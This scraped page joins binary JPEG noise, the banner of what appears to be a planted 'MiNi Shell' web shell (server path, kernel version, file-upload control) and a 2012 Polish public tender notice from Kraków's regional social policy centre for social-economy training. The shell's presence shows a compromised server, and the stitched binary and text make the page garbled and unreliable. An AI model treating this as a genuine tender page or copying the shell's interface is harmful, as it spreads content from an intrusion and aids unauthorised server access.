JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/65616-N-2012.html

<p class="kh_header"><b>Kraków: Zorganizowanie i przeprowadzenie szkoleń z zakresu zasad funkcjonowania spółdzielczości socjalnej w Polsce oraz wykorzystywania narzędzi ekonomii społecznej na rzecz rozwoju lokalnego - w ramach projektu Akademia Rozwoju Ekonomii Społecznej - Etap I</b><br>
<b>Numer ogłoszenia: 65616 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Piastowska 32, 30-070 Kraków, woj. małopolskie, tel. 0-12 422 06 36, faks 0-12 422 06 36 w. 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń z zakresu zasad funkcjonowania spółdzielczości socjalnej w Polsce oraz wykorzystywania narzędzi ekonomii społecznej na rzecz rozwoju lokalnego - w ramach projektu Akademia Rozwoju Ekonomii Społecznej - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
3.2. Część I zamówienia obejmuje:
-przeprowadzenie wymienionych w pkt. 3.3.1. Części I SIWZ szkoleń z zakresu praktycznych aspektów prowadzenia przedsiębiorstwa społecznego, skierowanych do osób prowadzących działalność w formie spółdzielni socjalnej oraz przedstawicieli podmiotów ekonomii społecznej - dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, na warunkach określonych w pkt. 3.4.1. Części I SIWZ,
-opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie|powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu - na warunkach określonych w pkt. 3.4.2. Części I SIWZ,
-zapewnienie sali szkoleniowej - na warunkach wskazanych w pkt. 3.4.3. Części I SIWZ,
-zapewnienie w trakcie szkoleń cateringu - na warunkach wskazanych w pkt. 3.4.4. Części I SIWZ. 
3.2. Część II zamówienia obejmuje:
-przeprowadzenie wymienionych w pkt. 3.3.2. Części I SIWZ szkoleń z zakresu podstaw funkcjonowania podmiotów ekonomii społecznej, w szczególności przedsiębiorstw społecznych, skierowanych do osób fizycznych, które chcą założyć spółdzielnię socjalną oraz zainteresowanych tą tematyką, w tym przedstawicieli jednostek samorządu terytorialnego, urzędów i instytucji rynku pracy oraz pomocy społecznej - dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, na warunkach określonych w pkt. 3.4.1. Części I SIWZ,
-opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie|powielenie w liczbie odpowiadającej ilości osób zakwalifikowanych do udziału w szkoleniu - na warunkach określonych w pkt. 3.4.2. Części I SIWZ,
-zapewnienie sali szkoleniowej - na warunkach wskazanych w pkt. 3.4.3. Części I SIWZ,
-zapewnienie w trakcie szkoleń cateringu - na warunkach wskazanych w pkt. 3.4.4. Części I SIWZ.

3.3. Zakres tematyczny szkoleń, ilość grup szkoleniowych, ilość godzin szkoleniowych, orientacyjne terminy szkoleń: 

3.3.1. Szkolenia objęte częścią I zamówienia:
1)	Szkolenie nr 1:
|Marketing w spółdzielni socjalnej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - kwiecień 2012 r., Grupa II - wrzesień 2012 r.
2)	Szkolenie nr 2:
|Obowiązki związane z prowadzeniem księgowości, ze szczególnym uwzględnieniem prowadzenia księgowości w spółdzielni socjalnej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenie będą przeprowadzone w terminach: Grupa I - maj 2012 r., Grupa II - październik 2012 r.
3)	Szkolenie nr 3:
|Być przedsiębiorcą - czyli umiejętne i efektywne zarządzanie zespołem z uwzględnieniem sytuacji konfliktowych, negocjowanie| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - czerwiec 2012 r., Grupa II - wrzesień 2012 r.
4)	Szkolenie nr 4:
|Budowanie marki oraz PR w spółdzielni socjalnej jako sposób pozyskania i utrzymania klienta na konkurencyjnym rynku| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - lipiec 2012 r., Grupa II - listopad 2012 r.
5)	Szkolenie nr 5:
|Budżetowanie, planowanie i poszukiwanie dodatkowych źródeł finansowania jako element biznes planu-narzędzia weryfikujące finanse w funkcjonującym przedsiębiorstwie społecznym| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - sierpień 2012 r., grupa II - grudzień 2012 r.

3.3.2. Szkolenia objęte częścią II zamówienia: 
1)	Szkolenie nr 6:
|Spółdzielnia socjalna jako forma prowadzenia działalności gospodarczej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - kwiecień 2012 r., grupa II - wrzesień 2012 r.
2)	Szkolenie nr 7:
|Produkt lokalny jako czynnik aktywizacji społeczności lokalnej z uwzględnieniem punktu przedszkolnego jako formy działalności spółdzielczej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - maj 2012 r., Grupa II - październik 2012 r.
3)	Szkolenie nr 8:
|Pisanie projektów i pozyskiwanie funduszy na finansowanie działań w obszarze ekonomii społecznej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - czerwiec 2012 r., Grupa II - listopad 2012 r.
4)	Szkolenie nr 9:
|Ekonomia społeczna i partnerstwo, czyli dlaczego warto ze sobą współpracować dla dobra społeczności lokalnej - z uwzględnieniem rodzajów podmiotów ekonomii społecznej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - lipiec 2012 r., Grupa II - październik 2012 r.
5)	Szkolenie nr 10:
|ABC ekonomii społecznej - podstawowe pojęcia, prawne podstawy zakładania i prowadzenia podmiotów ekonomii społecznej| - Wykonawca przeszkoli 2 grupy szkoleniowe do 20 osób w każdej grupie, w wymiarze 8 godzin szkoleniowych dla każdej grupy (łącznie 16 godzin szkoleniowych), w cyklach jednodniowych. Szkolenia będą przeprowadzone w terminach: Grupa I - sierpień 2012 r., Grupa II - grudzień2012 r.

3.4. Wymagania w zakresie zorganizowania szkoleń (dotyczy zarówno części I, jak i części II zamówienia):
3.4.1. Szkolenia - Zamawiający wymaga, aby:
-Wykonawca zapewnił trenera|trenerów o odpowiednich kwalifikacjach i doświadczeniu, określonych w pkt. 8.2.3. Części I SIWZ,
-Wykonawca wyraził zgodę oraz zagwarantował pisemną zgodę trenera|trenerów na nagrywanie szkolenia za pomocą dyktafonu,
-szkolenia odbywały się w dniach roboczych (od poniedziałku do piątku), w przedziale godzin od 9.00 do 17.00,
-Wykonawca zapewnił dwie 15-minutowe przerwy kawowe podstawowe oraz 30-minutową przerwę kawową rozszerzoną w trakcie każdego szkolenia,
-Wykonawca umożliwił przedstawicielom Zamawiającego przeprowadzenie wśród uczestników ankiet dotyczących szkolenia i jego organizacji, a także zebranie podpisów uczestników na listach obecności, listach potwierdzających otrzymanie materiałów szkoleniowych, skorzystanie z cateringu itp.,
-Wykonawca, bez pisemnej zgody Zamawiającego lub jego przedstawiciela, nie przedstawiał uczestnikom własnych ankiet, list, itp.
-szkolenia odbywały się na terenie Krakowa,
-po przeprowadzeniu szkolenia Wykonawca powinien:
-wystawić dla uczestników szkoleń imienne zaświadczenia o udziale w szkoleniu, opatrzone logotypem Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego, logotypem Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej, w formie zapisu: |Szkolenie współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego|; użyte logotypy i sformułowania muszą być zgodne z aktualnymi |Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki|, przygotowanymi przez Ministerstwo Rozwoju Regionalnego; ponadto, zaświadczenia powinny być opatrzone logotypami projektu Akademia Rozwoju Ekonomii Społecznej - Etap I oraz Regionalnego Ośrodka Polityki Społecznej w Krakowie,
-sporządzić sprawozdanie ze szkolenia i dostarczyć je Zamawiającemu.
3.4.2. Materiały szkoleniowe - Zamawiający wymaga, aby:
-przekazane materiały szkoleniowe opatrzone były logotypem Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego, logotypem Programu Operacyjnego Kapitał Ludzki oraz informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej, w formie zapisu: |Szkolenie współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego|; użyte logotypy i sformułowania muszą być zgodne z aktualnymi |Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki|, przygotowanymi przez Ministerstwo Rozwoju Regionalnego; ponadto, materiały powinny być opatrzone logotypami projektu Akademia Rozwoju Ekonomii Społecznej - Etap I oraz Regionalnego Ośrodka Polityki Społecznej w Krakowie, 
-strona tytułowa materiałów szkoleniowych była zgodna ze wzorem przekazanym przez Zamawiającego, w szczególności nie zawierała logotypów Wykonawcy lub informacji o Wykonawcy,
-Wykonawca zamieszczał swoje logotypy|informacje o Wykonawcy wyłącznie na ostatniej stronie materiałów szkoleniowych,
-Wykonawca przekazał Zamawiającemu na potrzeby dokumentacji projektowej jeden egzemplarz materiałów w formie papierowej oraz jeden w formie elektronicznej.
3.4.3. Sala szkoleniowa - Zamawiający wymaga, aby:
-Wykonawca zagwarantował w ramach szkoleń salę szkoleniową na terenie miasta Krakowa, dostępną przez 8 godzin dziennie, utrzymaną w czystości, z dostępem do zaplecza sanitarnego, o powierzchni co najmniej 50 m2, pozbawioną przedmiotów nie związanych ze szkoleniem, z dostępem do światła dziennego oraz możliwością zasłonięcia okien, wyposażoną w sprawną klimatyzację oraz sprawne ogrzewanie, sprzęt do przeprowadzenia szkoleń: nagłośnienie, ekran do wyświetlania multimediów, flipcharty z kartkami papieru oraz kompletem markerów, dostęp do internetu, z ilością miejsc siedzących odpowiadających liczbie uczestników danego szkolenia (20 osób), z możliwością ułożenia miejsc siedzących w układzie szkolnym oraz w formie podkowy;
-Wykonawca zapewnił oznakowanie sali szkoleniowej zgodnie z wytycznymi Zamawiającego (w szczególności informacja o realizacji szkolenia, umieszczona w widocznym miejscu w recepcji ośrodka, w którym szkolenie jest realizowane, oraz przy wejściu|wejściach do sali szkoleniowej),
3.4.4. Catering - Zamawiający wymaga, aby:
-Wykonawca zapewnił w trakcie szkoleń catering w postaci:
-serwis kawowy podstawowy (w trakcie którego podawana będzie kawa, mleko do kawy, herbata, soki owocowe, woda mineralna, ciasteczka) - w czasie określonym 
w harmonogramie, 
-serwis kawowy poszerzony (w trakcie którego podawana będzie kawa, mleko do kawy, herbata, soki owocowe, woda mineralna, ciasteczka, kanapki bankietowe m.in. z wędliną, serami i warzywami - min. 4 szt.|os., dwie sałatki - każda min. 100 gr. na osobę, świeże owoce, ciasto pieczone - np. sernik, jabłecznik) - w czasie określonym w harmonogramie;
przygotowanie oraz dostarczenie cateringu dla uczestników szkolenia odbywało się zgodnie z obowiązującymi w tym zakresie przepisami prawa.

Szczegółowy opis przedmiotu zamówienia znajduje się w Części III SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy w tym w szczególności: w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy) w tym okresie - wykonał (a w przypadku świadczeń okresowych lub ciągłych - również wykonuje) usługi polegające na przeprowadzeniu co najmniej 2 szkoleń dla co najmniej 10 osób każde, odpowiadających swoim rodzajem (tematyką szkolenia) dowolnemu szkoleniu/dowolnym szkoleniom objętym daną częścią zamówienia (Zamawiający uzna, że szkolenie odpowiada swoim rodzajem (tematyką szkolenia) szkoleniu objętemu daną częścią zamówienia, jeżeli z przedłożonego wykazu jednoznacznie wynikać będzie, że zakres wykazanego szkolenia obejmuje co najmniej połowę elementów wymienionych w pozycji |minimalna wymagana treść szkolenia| odpowiedniej tabeli w Części III SIWZ). Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności wykażą, iż w okresie realizacji usługi będą dysponować dysponował obiektem spełniającym wymogi określone w pkt. 3 Części I SIWZ (pkt II.1.3. ogłoszenia) tj. salą szkoleniową na terenie miasta Krakowa, dostępną przez 8 godzin dziennie, utrzymaną w czystości, z dostępem do zaplecza sanitarnego, o powierzchni co najmniej 50 m2, pozbawioną przedmiotów nie związanych ze szkoleniem, z dostępem do światła dziennego oraz możliwością zasłonięcia okien, wyposażoną w sprawną klimatyzację oraz sprawne ogrzewanie, sprzęt do przeprowadzenia szkoleń: nagłośnienie, ekran do wyświetlania multimediów, flipcharty z kartkami papieru oraz kompletem markerów, dostęp do internetu, z ilością miejsc siedzących odpowiadających liczbie uczestników danego szkolenia (20 osób), z możliwością ułożenia miejsc siedzących w układzie szkolnym oraz w formie podkowy;. Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 ustawy, w tym w szczególności wykażą, iż w okresie realizacji usługi będą dysponować odpowiednim personelem, tj. co najmniej jedną osobą (trenerem), która posiada wyższe wykształcenie oraz doświadczenie w prowadzeniu szkoleń w postaci przeprowadzonych co najmniej 2 szkoleń dla co najmniej 10 osób każde, odpowiadających swoim rodzajem (tematyką szkolenia) dowolnemu szkoleniu/dowolnym szkoleniom objętym daną częścią zamówienia (Zamawiający uzna, że szkolenie odpowiada swoim rodzajem (tematyką szkolenia) szkoleniu objętemu daną częścią zamówienia, jeżeli z przedłożonego wykazu jednoznacznie wynikać będzie, że zakres wykazanego szkolenia obejmuje co najmniej połowę elementów wymienionych w pozycji |minimalna wymagana treść szkolenia| odpowiedniej tabeli w Części III SIWZ). Ocena spełniania przez wykonawców warunków udziału w postępowaniu - o których mowa powyżej zostanie dokonana w oparciu o dokumenty wymienione w pkt III.4.1) ogłoszenia. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy Pzp, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia-jeżeli dotyczy. 2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz Oferty według wzoru stanowiącego załącznik nr 1 do SIWZ. 3. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze.</p>
